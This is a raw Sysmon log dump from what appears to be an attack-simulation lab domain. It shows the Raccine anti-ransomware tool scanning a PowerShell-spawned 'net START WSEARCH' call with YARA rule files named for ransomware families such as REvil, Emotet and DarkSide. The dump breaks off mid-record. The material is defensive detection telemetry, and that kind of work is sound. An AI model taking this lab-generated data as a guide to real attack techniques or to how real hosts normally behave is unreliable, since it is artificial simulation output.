ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002245585Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.476{9DBE88B5-5543-61B2-D808-010000000E02}66247564C:\Windows\system32\conhost.exe{9DBE88B5-5543-61B2-D708-010000000E02}7840C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245579Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.465{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5543-61B2-D708-010000000E02}7840C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002245578Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.464{9DBE88B5-5543-61B2-C308-010000000E02}54645672C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5543-61B2-D708-010000000E02}7840C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002245577Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.465{9DBE88B5-5543-61B2-D708-010000000E02}7840C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\powershell_loaders.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBC08.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002245573Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.447{9DBE88B5-5543-61B2-D608-010000000E02}4900948C:\Windows\system32\conhost.exe{9DBE88B5-5543-61B2-D508-010000000E02}7680C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245567Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.434{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5543-61B2-D508-010000000E02}7680C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002245566Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.434{9DBE88B5-5543-61B2-C308-010000000E02}54645672C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5543-61B2-D508-010000000E02}7680C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002245565Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.434{9DBE88B5-5543-61B2-D508-010000000E02}7680C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\other_0xa9five_poc.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBC08.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002245562Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.419{9DBE88B5-5543-61B2-D408-010000000E02}75963524C:\Windows\system32\conhost.exe{9DBE88B5-5543-61B2-D308-010000000E02}3808C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245556Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.407{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5543-61B2-D308-010000000E02}3808C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002245555Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.407{9DBE88B5-5543-61B2-C308-010000000E02}54645672C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5543-61B2-D308-010000000E02}3808C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002245554Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.407{9DBE88B5-5543-61B2-D308-010000000E02}3808C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_revil.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBC08.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002245550Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.390{9DBE88B5-5543-61B2-D208-010000000E02}65566376C:\Windows\system32\conhost.exe{9DBE88B5-5543-61B2-D108-010000000E02}8128C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245544Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.377{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5543-61B2-D108-010000000E02}8128C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002245543Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.377{9DBE88B5-5543-61B2-C308-010000000E02}54645672C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5543-61B2-D108-010000000E02}8128C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002245542Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.377{9DBE88B5-5543-61B2-D108-010000000E02}8128C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_exchange_cryptominer.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBC08.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002245539Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.358{9DBE88B5-5543-61B2-D008-010000000E02}47765616C:\Windows\system32\conhost.exe{9DBE88B5-5543-61B2-CF08-010000000E02}2800C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245533Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.345{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5543-61B2-CF08-010000000E02}2800C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002245532Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.345{9DBE88B5-5543-61B2-C308-010000000E02}54645672C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5543-61B2-CF08-010000000E02}2800C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002245531Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.345{9DBE88B5-5543-61B2-CF08-010000000E02}2800C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_emotet.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBC08.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002245528Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.329{9DBE88B5-5543-61B2-CE08-010000000E02}55805680C:\Windows\system32\conhost.exe{9DBE88B5-5543-61B2-CD08-010000000E02}7796C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245522Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.317{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5543-61B2-CD08-010000000E02}7796C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002245521Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.317{9DBE88B5-5543-61B2-C308-010000000E02}54645672C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5543-61B2-CD08-010000000E02}7796C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002245520Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.317{9DBE88B5-5543-61B2-CD08-010000000E02}7796C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_darkside.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBC08.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002245516Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.301{9DBE88B5-5543-61B2-CC08-010000000E02}20405436C:\Windows\system32\conhost.exe{9DBE88B5-5543-61B2-CB08-010000000E02}7276C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245510Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.290{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5543-61B2-CB08-010000000E02}7276C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002245509Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.290{9DBE88B5-5543-61B2-C308-010000000E02}54645672C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5543-61B2-CB08-010000000E02}7276C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002245508Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.291{9DBE88B5-5543-61B2-CB08-010000000E02}7276C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_ransomware_command_lines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBC08.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002245505Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.276{9DBE88B5-5543-61B2-CA08-010000000E02}66128016C:\Windows\system32\conhost.exe{9DBE88B5-5543-61B2-C908-010000000E02}5756C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245499Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.265{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5543-61B2-C908-010000000E02}5756C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002245498Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.265{9DBE88B5-5543-61B2-C308-010000000E02}54645672C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5543-61B2-C908-010000000E02}5756C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002245497Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.265{9DBE88B5-5543-61B2-C908-010000000E02}5756C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_raccine_kills.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBC08.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002245494Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.250{9DBE88B5-5543-61B2-C808-010000000E02}64604764C:\Windows\system32\conhost.exe{9DBE88B5-5543-61B2-C708-010000000E02}6180C:\Program 